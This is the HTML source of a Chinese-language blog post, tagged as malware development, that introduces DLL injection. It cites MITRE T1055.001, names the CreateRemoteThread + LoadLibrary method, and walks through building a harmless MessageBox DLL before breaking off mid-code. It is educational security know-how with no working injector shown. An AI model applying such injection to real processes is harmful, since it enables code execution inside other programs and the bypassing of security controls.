<!DOCTYPE html>
<html lang="zh-tw">
<head>
  <meta charset="utf-8">
  <title>那些常見與不常見的DLL注入技術 | Dinlon's Blog</title>
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="keywords" content="blog, hexo, dinlon5566, dinlon, dinlon5566.com, dinlon5566.github.io">
  <meta name="theme-color" content="#10b981">

  <link rel="canonical" href="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/">

  

  <meta name="description" content="這一篇文章將會導覽各種 DLL 注入技術與 LoadLibrary 注入實作方法，還有進行開發時要注意的一些事情">
<meta property="og:type" content="article">
<meta property="og:title" content="那些常見與不常見的DLL注入技術">
<meta property="og:url" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/index.html">
<meta property="og:site_name" content="Dinlon&#39;s Blog">
<meta property="og:description" content="這一篇文章將會導覽各種 DLL 注入技術與 LoadLibrary 注入實作方法，還有進行開發時要注意的一些事情">
<meta property="og:locale" content="zh_TW">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/image1.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250610132425.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609163305.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609174423.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609175432.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611185232.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250615024505.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611195208.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250611200142.png">
<meta property="og:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250612011511.png">
<meta property="article:published_time" content="2025-06-14T20:03:00.000Z">
<meta property="article:modified_time" content="2025-06-14T21:45:28.245Z">
<meta property="article:author" content="Dinlon5566">
<meta property="article:tag" content="惡意程式開發">
<meta property="article:tag" content="簡易">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/image1.png">
  <meta name="generator" content="Hexo 7.3.0">
  <script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.dinlon5566.com/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/"},"headline":"那些常見與不常見的DLL注入技術","description":"這一篇文章將會導覽各種 DLL 注入技術與 LoadLibrary 注入實作方法，還有進行開發時要注意的一些事情","datePublished":"2025-06-14T20:03:00.000Z","dateModified":"2025-06-14T21:45:28.245Z","author":{"@type":"Person","name":"Dinlon5566"},"publisher":{"@type":"Organization","name":"Dinlon's Blog","logo":{"@type":"ImageObject","url":"https://blog.dinlon5566.com/favicon.ico"}}}
</script>

  
  
<link rel="stylesheet" href="/css/main.css">

  <style>
    :root {
      --sea-color-primary: #10b981;
    }
  </style>

  
<script src="/js/theme_mode.js"></script>

</head>
<body>
  <header class="sea-header">
    <nav class="sea-nav-wrap">
  <div class="sea-nav-logo" title="">
    <a href="/">Dinlon's Blog</a>
  </div>
  <div class="sea-nav-menus">
    <div id="sea-nav-toggle">
      <svg t="1716965724278" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="10878" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M950.857143 768v73.142857c0 20.004571-16.566857 36.571429-36.571429 36.571429H109.714286c-20.004571 0-36.571429-16.566857-36.571429-36.571429v-73.142857c0-20.004571 16.566857-36.571429 36.571429-36.571429h804.571428c20.004571 0 36.571429 16.566857 36.571429 36.571429z m0-292.571429v73.142858c0 20.004571-16.566857 36.571429-36.571429 36.571428H109.714286c-20.004571 0-36.571429-16.566857-36.571429-36.571428v-73.142858c0-20.004571 16.566857-36.571429 36.571429-36.571428h804.571428c20.004571 0 36.571429 16.566857 36.571429 36.571428z m0-292.571428v73.142857c0 20.004571-16.566857 36.571429-36.571429 36.571429H109.714286c-20.004571 0-36.571429-16.566857-36.571429-36.571429V182.857143c0-20.004571 16.566857-36.571429 36.571429-36.571429h804.571428c20.004571 0 36.571429 16.566857 36.571429 36.571429z" p-id="10879"></path></svg>
    </div>

    <div id="sea-nav-dimmer"></div>
<div class="sea-menu-wrap">
  
    <a
      class="sea-menu-link "
      
      href="/articles/"
    >
      文章
    </a>
  

  <span class="sea-menu-sep">|</span>

  
  

  
    <a href="/search" title="Search">
  <span class="sea-menu-icon" id="sea-search-icon">
    <svg t="1725410662861" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="5552" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M400.085333 151.210667c-89.059556 0-172.672 47.616-218.197333 124.273777a14.222222 14.222222 0 1 0 24.462222 14.535112c40.433778-68.067556 114.659556-110.364444 193.735111-110.364445a14.222222 14.222222 0 1 0 0-28.444444zM170.197333 336.298667a14.236444 14.236444 0 0 0-17.080889 10.609777c-4.252444 18.147556-6.656 29.397333-6.656 49.592889a14.222222 14.222222 0 1 0 28.444445 0c0-17.137778 1.92-26.083556 5.902222-43.121777a14.222222 14.222222 0 0 0-10.609778-17.080889z" fill="" p-id="5553"></path><path d="M947.384889 821.944889L717.809778 592.384a70.584889 70.584889 0 0 0-16.64-12.472889 346.254222 346.254222 0 0 0 47.36-175.089778c0-192.142222-156.302222-348.444444-348.444445-348.444444-192.128 0-348.444444 156.302222-348.444444 348.444444s156.316444 348.430222 348.444444 348.430223c68.408889 0 132.209778-19.882667 186.083556-54.058667 2.915556 4.821333 6.570667 9.472 10.951111 13.852444l229.575111 229.589334a84.849778 84.849778 0 0 0 60.359111 24.974222 84.821333 84.821333 0 0 0 60.344889-24.974222 84.778667 84.778667 0 0 0 24.974222-60.330667 84.920889 84.920889 0 0 0-24.988444-60.359111zM108.529778 404.835556c0-160.768 130.787556-291.555556 291.555555-291.555556 160.782222 0 291.555556 130.787556 291.555556 291.555556 0 160.782222-130.801778 291.541333-291.555556 291.541333-160.768 0-291.555556-130.759111-291.555555-291.541333z m798.620444 497.578666c-10.766222 10.723556-29.496889 10.723556-40.248889 0L637.340444 672.839111c-1.991111-1.976889-2.730667-3.299556-2.830222-3.299555 0.042667-0.611556 0.824889-6.471111 17.080889-22.698667 16.213333-16.256 22.072889-16.995556 22.257778-17.109333 0.369778 0.113778 1.692444 0.853333 3.740444 2.887111l229.546667 229.560889c5.390222 5.390222 8.334222 12.529778 8.334222 20.138666a28.401778 28.401778 0 0 1-8.32 20.096z" p-id="5554"></path></svg>
  </span>
</a>
  


  <span class="sea-menu-icon" id="sea-theme-dark">
    <svg t="1725413107294" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="10118" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M557.553778 976.355556c-257.265778 0-466.56-207.160889-466.56-464.426667 0-253.923556 206.577778-464.284444 460.501333-464.284445h0.355556c10.766222 0 20.622222 3.953778 25.443555 13.610667 4.878222 9.756444 3.740444 20.394667-2.915555 29.027556-55.722667 72.220444-85.162667 158.108444-85.162667 249.372444 0 225.891556 183.779556 409.386667 409.671111 409.386667l5.248-0.256c10.325333-0.142222 20.977778 5.859556 25.841778 15.644444a28.302222 28.302222 0 0 1-2.915556 30.051556C837.902222 910.08 703.203556 976.355556 557.553778 976.355556zM495.274667 105.016889C299.192889 135.281778 147.882667 306.161778 147.882667 509.809778c0 225.877333 183.779556 409.656889 409.671111 409.656889 108.686222 0 210.403556-42.055111 286.577778-116.977778-231.566222-27.192889-411.804444-224.625778-411.804445-463.36 0-83.427556 21.617778-163.299556 62.947556-234.112z" fill="" p-id="10119"></path><path d="M578.830222 879.132444c-186.865778 0-345.784889-133.418667-377.841778-317.269333a14.222222 14.222222 0 1 1 28.017778-4.878222c29.681778 170.183111 176.810667 293.703111 349.824 293.703111a14.222222 14.222222 0 1 1 0 28.444444zM209.991111 531.2c-7.537778 0-13.838222-6.997333-14.193778-14.606222-0.312889-6.584889-0.483556-13.795556-0.483555-20.465778 0-7.864889 6.357333-14.492444 14.222222-14.492444s14.222222 6.229333 14.222222 14.094222c0 6.229333 0.170667 13.425778 0.455111 19.584 0.369778 7.850667-5.674667 15.886222-13.525333 15.886222h-0.696889z" fill="" p-id="10120"></path><path d="M622.350222 309.930667m-25.344 0a25.344 25.344 0 1 0 50.688 0 25.344 25.344 0 1 0-50.688 0Z" fill="" p-id="10121"></path><path d="M787.072 188.273778m-25.344 0a25.344 25.344 0 1 0 50.688 0 25.344 25.344 0 1 0-50.688 0Z" fill="" p-id="10122"></path><path d="M731.960889 415.303111m-25.344 0a25.344 25.344 0 1 0 50.688 0 25.344 25.344 0 1 0-50.688 0Z" p-id="10123"></path></svg>
  </span>
  <span class="sea-menu-icon" id="sea-theme-light">
    <svg t="1725410359322" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4274" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M512 768c-141.376 0-256-114.624-256-256s114.624-256 256-256 256 114.624 256 256-114.624 256-256 256z m0-85.333333a170.666667 170.666667 0 1 0 0-341.333334 170.666667 170.666667 0 0 0 0 341.333334zM469.333333 85.333333a42.666667 42.666667 0 1 1 85.333334 0v85.333334a42.666667 42.666667 0 1 1-85.333334 0V85.333333z m0 768a42.666667 42.666667 0 1 1 85.333334 0v85.333334a42.666667 42.666667 0 1 1-85.333334 0v-85.333334zM85.333333 554.666667a42.666667 42.666667 0 1 1 0-85.333334h85.333334a42.666667 42.666667 0 1 1 0 85.333334H85.333333z m768 0a42.666667 42.666667 0 1 1 0-85.333334h85.333334a42.666667 42.666667 0 1 1 0 85.333334h-85.333334zM161.834667 222.165333a42.666667 42.666667 0 0 1 60.330666-60.330666l64 64a42.666667 42.666667 0 0 1-60.330666 60.330666l-64-64z m576 576a42.666667 42.666667 0 0 1 60.330666-60.330666l64 64a42.666667 42.666667 0 0 1-60.330666 60.330666l-64-64z m-515.669334 64a42.666667 42.666667 0 0 1-60.330666-60.330666l64-64a42.666667 42.666667 0 0 1 60.330666 60.330666l-64 64z m576-576a42.666667 42.666667 0 0 1-60.330666-60.330666l64-64a42.666667 42.666667 0 0 1 60.330666 60.330666l-64 64z" p-id="4275"></path></svg>
  </span>

  <span id="sea-menu-close-icon">
    <svg t="1725435896874" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="4408" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M556.8 512l265.6-265.6c12.8-12.8 12.8-32 0-44.8s-32-12.8-44.8 0L512 467.2 246.4 201.6c-12.8-12.8-32-12.8-44.8 0s-12.8 32 0 44.8l265.6 265.6-265.6 265.6c-12.8 12.8-12.8 32 0 44.8 6.4 6.4 12.8 9.6 22.4 9.6s16-3.2 22.4-9.6l265.6-265.6 265.6 265.6c6.4 6.4 16 9.6 22.4 9.6s16-3.2 22.4-9.6c12.8-12.8 12.8-32 0-44.8L556.8 512z" p-id="4409"></path></svg>
  </span>
</div>
  </div>
</nav>
  </header>
  <main id="sea-main-wrapper" data-pagefind-body>
    <article class="sea-page-card-wrapper">
  <header class="sea-article-header">
    <h1 class="sea-article-title">那些常見與不常見的DLL注入技術</h1>
    
      <div class="sea-post-meta sea-post-meta__center">
        <div class="sea-post-time">
  <svg t="1716964550804" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="2621" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M805.49888 981.49888l-602.3168-0.76288c-86.59456-8.192-154.56768-81.3056-154.56768-170.01472L48.6144 291.73248c0-94.1568 76.60032-170.75712 170.7776-170.75712l586.10176 0c94.1568 0 170.73152 76.60032 170.73152 170.75712L976.22528 810.7008C976.2304 904.87296 899.63008 981.49888 805.49888 981.49888L805.49888 981.49888zM219.3664 190.57152c-55.79776 0-101.20192 45.38368-101.20192 101.18144l0 518.96832c0 55.79776 45.40416 101.20704 101.20192 101.20704l586.13248 0c55.77728 0 101.16096-45.40928 101.16096-101.20704L906.65984 291.73248c0-55.79776-45.38368-101.18656-101.16096-101.18656L219.3664 190.54592 219.3664 190.57152zM698.84416 290.51904c-25.60512 0-46.38208-20.77696-46.38208-46.38208l0-158.6688c0-25.6 20.77696-46.38208 46.38208-46.38208 25.6 0 46.38208 20.78208 46.38208 46.38208L745.22624 244.1216C745.22624 269.7472 724.46976 290.51904 698.84416 290.51904L698.84416 290.51904zM315.65824 290.51904c-25.60512 0-46.38208-20.77696-46.38208-46.38208l0-158.6688c0-25.6 20.77696-46.38208 46.38208-46.38208 25.6 0 46.38208 20.78208 46.38208 46.38208L362.04032 244.1216C362.04032 269.7472 341.28896 290.51904 315.65824 290.51904L315.65824 290.51904zM534.8864 794.78784l-44.27264 0c-25.6 0-46.38208-20.77696-46.38208-46.38208 0-25.6 20.78208-46.38208 46.38208-46.38208l44.27264 0c25.6 0 46.38208 20.78208 46.38208 46.38208C581.26848 774.01088 560.4864 794.78784 534.8864 794.78784L534.8864 794.78784zM930.79552 452.608 121.24672 452.608c-25.60512 0-46.38208-20.78208-46.38208-46.38208 0-25.60512 20.77696-46.38208 46.38208-46.38208l809.5744 0c25.6 0 46.38208 20.77696 46.38208 46.38208C977.2032 431.82592 956.42624 452.608 930.79552 452.608L930.79552 452.608zM327.92576 649.03168l-44.27264 0c-25.6 0-46.38208-20.78208-46.38208-46.38208 0-25.60512 20.78208-46.38208 46.38208-46.38208l44.27264 0c25.6 0 46.38208 20.77696 46.38208 46.38208C374.30784 628.25472 353.52576 649.03168 327.92576 649.03168L327.92576 649.03168zM534.8864 649.03168l-44.27264 0c-25.6 0-46.38208-20.78208-46.38208-46.38208 0-25.60512 20.78208-46.38208 46.38208-46.38208l44.27264 0c25.6 0 46.38208 20.77696 46.38208 46.38208S560.4864 649.03168 534.8864 649.03168L534.8864 649.03168zM741.27872 649.03168l-44.26752 0c-25.60512 0-46.38208-20.78208-46.38208-46.38208 0-25.60512 20.77696-46.38208 46.38208-46.38208l44.26752 0c25.60512 0 46.38208 20.77696 46.38208 46.38208C787.6608 628.25472 766.90944 649.03168 741.27872 649.03168L741.27872 649.03168zM327.92576 794.78784l-44.27264 0c-25.6 0-46.38208-20.77696-46.38208-46.38208 0-25.6 20.78208-46.38208 46.38208-46.38208l44.27264 0c25.6 0 46.38208 20.78208 46.38208 46.38208C374.30784 774.01088 353.52576 794.78784 327.92576 794.78784L327.92576 794.78784zM741.27872 794.78784l-44.26752 0c-25.60512 0-46.38208-20.77696-46.38208-46.38208 0-25.6 20.77696-46.38208 46.38208-46.38208l44.26752 0c25.60512 0 46.38208 20.78208 46.38208 46.38208C787.6608 774.01088 766.90944 794.78784 741.27872 794.78784L741.27872 794.78784z" p-id="2622"></path></svg>
  <time datetime="2025-06-14T20:03:00.000Z">2025-06-15</time>
</div>
        
        
  <div class="sea-post-tags">
    <svg t="1716964811431" class="sea-svg-icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="6117" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><path d="M384 977.152c-20.5312 0-39.8336-7.9872-54.3232-22.4256l-260.4032-260.4032c-14.4896-14.4896-22.4256-33.7408-22.4256-54.3232s7.9872-39.8336 22.4256-54.3232l439.6032-439.6032c24.9344-24.9344 70.2464-43.7248 105.5232-43.7248h230.4c42.3424 0 76.8 34.4576 76.8 76.8v230.4c0 35.2256-18.7904 80.5888-43.6736 105.5232l-439.6032 439.6032a76.1856 76.1856 0 0 1-54.3232 22.4256zM614.4 153.6c-21.248 0-54.272 13.6704-69.2736 28.7232l-439.6032 439.6032c-4.8128 4.8128-7.424 11.2128-7.424 18.1248s2.6624 13.312 7.424 18.0736l260.4032 260.4032c4.8128 4.8128 11.2128 7.424 18.1248 7.424s13.312-2.6624 18.1248-7.424l439.6032-439.6032c15.0016-15.0016 28.7232-48.0768 28.7232-69.3248V179.2a25.6 25.6 0 0 0-25.6-25.6h-230.4z" p-id="6118"></path><path d="M742.4 358.4c-42.3424 0-76.8-34.4576-76.8-76.8S700.0576 204.8 742.4 204.8s76.8 34.4576 76.8 76.8S784.7424 358.4 742.4 358.4z m0-102.4a25.6 25.6 0 1 0 0 51.2 25.6 25.6 0 0 0 0-51.2z" p-id="6119"></path></svg>
    <a class="tag-link" href="/tags/%E6%83%A1%E6%84%8F%E7%A8%8B%E5%BC%8F%E9%96%8B%E7%99%BC/" rel="tag">惡意程式開發</a> , <a class="tag-link" href="/tags/%E7%B0%A1%E6%98%93/" rel="tag">簡易</a>
  </div>

      </div>
    
  </header>
  <div class="sea-doc">
    
    <div class="sea-article-content">
      <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>我把論文寫完了 \OwO&#x2F;</p>
<p>雖然我寫惡意程式的經驗也算不少，但每次要實作 DLL 注入時，總是習慣以 <code>CreateRemoteThread + LoadLibrary</code> 這種經典手法。所以我開始研究還有哪些 DLL 注入技術可以玩，卻發現網路上相關文章大多被付費牆或內容農場所污染 <del>甚至是我自己的文章XD</del>。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/image1.png"></p>
<p>既然這樣，就來把我蒐集到的DLL注入技術彙整於此，之後要用時就可以直接找這邊。這一篇文章將會導覽<strong>各種 DLL 注入技術與 <code>LoadLibrary</code> 注入實作方法，還有進行開發時要注意的一些事情</strong>。之後將會建立一個系列，對這篇提到的注入技術進行實作演示。</p>
<p>由於這篇文章可能會被我拿來當之後教案的材料 (沒錯又是鐵人賽)，所以會提供比較多的基礎知識。若你是有經驗或只是想查某些注入技術，可以直接來 <a href="#DLL-%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93%E6%91%98%E8%A6%81">DLL-注入技術摘要</a> 。</p>
<h1 id="DLL-注入技術簡介"><a href="#DLL-注入技術簡介" class="headerlink" title="DLL 注入技術簡介"></a>DLL 注入技術簡介</h1><h2 id="甚麼是-DLL-注入"><a href="#甚麼是-DLL-注入" class="headerlink" title="甚麼是 DLL 注入"></a>甚麼是 DLL 注入</h2><p><a target="_blank" rel="noopener" href="https://attack.mitre.org/techniques/T1055/001/">https://attack.mitre.org/techniques/T1055/001/</a></p>
<p>簡單來說，DLL 注入是一種讓你將自訂程式碼「塞進」正在執行的目標行程 (Process) 中的技術。使目標能以其權限執行你想要達成的目標，如存取私有記憶體、攔截或替換 API、乃至於繞過安全機制等等。而做法通常是在目標行程的<strong>記憶體空間中載入一個 DLL 檔案或路徑</strong>，隨後透過各種方式 <strong>呼叫 DLL 中的程式碼地址</strong>，藉此在該行程執行你自己的程式碼。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250610132425.png"></p>
<blockquote>
<p>等等，甚麼是 DLL?<br>							— 四年前的作者 </p>
</blockquote>
<p>由於很多人都沒有 DLL 開發的經驗與需求，即使是大部分資工系也不曾教過，導致讀到相關技術時時常一頭霧水。<br><strong>所以這邊以直白的方式講 DLL 到底是甚麼東西，與他要如何開發與運行?</strong> 如果你已經會了，<a href="#DLL-%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93%E6%91%98%E8%A6%81">點我傳送</a>。</p>
<h2 id="DLL-開發"><a href="#DLL-開發" class="headerlink" title="DLL 開發"></a>DLL 開發</h2><p>與其一直講理論的東西，我更喜歡在實作中講述他的功能。我們開啟 Visual Studio 2022 &gt; 建立新的專案 &gt; 選用 cpp 的<strong>動態連結程式庫</strong>(注意語言與名稱不要選錯)，並建立 “HelloDLL” 專案。<br><img src="/2025/06/15/%E9%82%A3%E4%BA%9B%E5%B8%B8%E8%A6%8B%E8%88%87%E4%B8%8D%E5%B8%B8%E8%A6%8B%E7%9A%84DLL%E6%B3%A8%E5%85%A5%E6%8A%80%E8%A1%93/20250609163305.png"></p>
<p>建立完成後，你會看到預設程式碼，寫著 <code>DllMain()</code> :</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token comment">// dllmain.cpp : 定義 DLL 應用程式的進入點。</span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">"pch.h"</span></span>

BOOL APIENTRY <span class="token function">DllMain</span><span class="token punctuation">(</span> HMODULE hModule<span class="token punctuation">,</span>DWORD  ul_reason_for_call<span class="token punctuation">,</span>LPVOID lpReserved<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">switch</span> <span class="token punctuation">(</span>ul_reason_for_call<span class="token punctuation">)</span> <span class="token comment">// 注意這邊</span>
    <span class="token punctuation">&#123;</span>
    <span class="token keyword">case</span> DLL_PROCESS_ATTACH<span class="token operator">:</span>
    <span class="token keyword">case</span> DLL_THREAD_ATTACH<span class="token operator">:</span>
    <span class="token keyword">case</span> DLL_THREAD_DETACH<span class="token operator">:</span>
    <span class="token keyword">case</span> DLL_PROCESS_DETACH<span class="token operator">:</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">return</span> TRUE<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>當系統呼叫<code>DllMain</code>時，會附帶一個 <code>ul_reason_for_call</code>參數，而這個參數只會在四種情況出現 :</p>
<ol>
<li><strong>DLL_PROCESS_ATTACH</strong>：當 DLL <strong>第一次載入到行程</strong> 時被呼叫，並且整個過程<strong>只會執行一次</strong>。</li>
<li><strong>DLL_PROCESS_DETACH</strong>：跟第一條相反。當 <strong>DLL 被行程移除</strong>時呼叫，一樣整個過程<strong>只會執行一次</strong>。</li>
<li><strong>DLL_THREAD_ATTACH</strong> ：當行程建立<strong>新執行緒</strong>時，就會呼叫。由於一個行程會有多個執行緒，因此可能會觸發好幾次。</li>
<li><strong>DLL_THREAD_DETACH</strong> ：跟第三條相反。該<strong>執行緒結束時</strong>，就會呼叫已進行執行緒層級的清理工作。</li>
</ol>
<p>讓我們嘗試編譯並執行這個 DLL程式，你會發現根本<strong>無法透過雙擊執行</strong>。這是因為 DLL 就像一個食譜，上面寫著各個功能的程式碼與位置，卻沒有自主執行的能力，這時候就需要一名廚師來發動這一本食譜。目前我們的食譜一道菜都沒有，所以先添加一道菜 “SayHello” :</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> CALLBACK <span class="token function">SayHello</span><span class="token punctuation">(</span>HWND hwnd<span class="token punctuation">,</span> HINSTANCE hinst<span class="token punctuation">,</span> LPSTR lpszCmdLine<span class="token punctuation">,</span> <span class="token keyword">int</span> nCmdShow<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">MessageBoxA</span><span class="token punctuation">(</span>hwnd<span class="token punctuation">,</span> <span class="token string">"Hello, World!\nFrom SayHello!"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></code></pre>
<p>他只會顯示一個寫著 <code>Hello, World! From SayHello!</code> 的訊息框，但它上面一堆怪東西是甚麼呢?</p>
<ul>
<li><strong>extern “C”</strong> : 指示編譯器採用 <strong>C linkage</strong> ，函式庫兼容C與cpp(避免<a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Name_mangling">name mangling</a>)。</li>
<li><strong>declspec(dllexport)</strong> : 此函數要輸出到 DLL，也就是在菜單上添加菜名。</li>
<li>void : 這函數沒回傳值。</li>
<li><strong>CALLBACK</strong> : 呼叫慣例巨集，在 Win32 為 <code>__stdcall</code> 與大多數 Win32 API 相容。</li>
<li>SayHello : 函數名稱。</li>
</ul>
<p>現在，我們稍微修改原本的程式碼，並進行編譯來觀察DLL的執行過程。</p>
<pre class="language-cpp" data-language="cpp"><code class="language-cpp"><span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> CALLBACK <span class="token function">SayHello</span><span class="token punctuation">(</span>HWND hwnd<span class="token punctuation">,</span> HINSTANCE hinst<span class="token punctuation">,</span> LPSTR lpszCmdLine<span class="token punctuation">,</span> <span class="token keyword">int</span> nCmdShow<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">MessageBoxA</span><span class="token punctuation">(</span>hwnd<span class="token punctuation">,</span> <span class="token string">"Hello, World!\nFrom SayHello!"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

BOOL APIENTRY <span class="token function">DllMain</span><span class="token punctuation">(</span>HMODULE hModule<span class="token punctuation">,</span>DWORD ul_reason_for_call<span class="token punctuation">,</span>LPVOID lpReserved<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">switch</span> <span class="token punctuation">(</span>ul_reason_for_call<span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>

    <span class="token keyword">case</span> DLL_PROCESS_ATTACH<span class="token operator">:</span>
        <span class="token function">MessageBoxA</span><span class="token punctuation">(</span><span class="token constant">NULL</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld DLL Loaded!\n DLL_PROCESS_ATTACH"</span><span class="token punctuation">,</span> <span class="token string">"HelloWorld"</span><span class="token punctuation">,</span> MB_OK <span class="token operator">|</span> MB_ICONINFORMATION<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>

    <span class="token keyword">case</span> DLL_THREAD_ATTACH<span class="token operator">:</span>
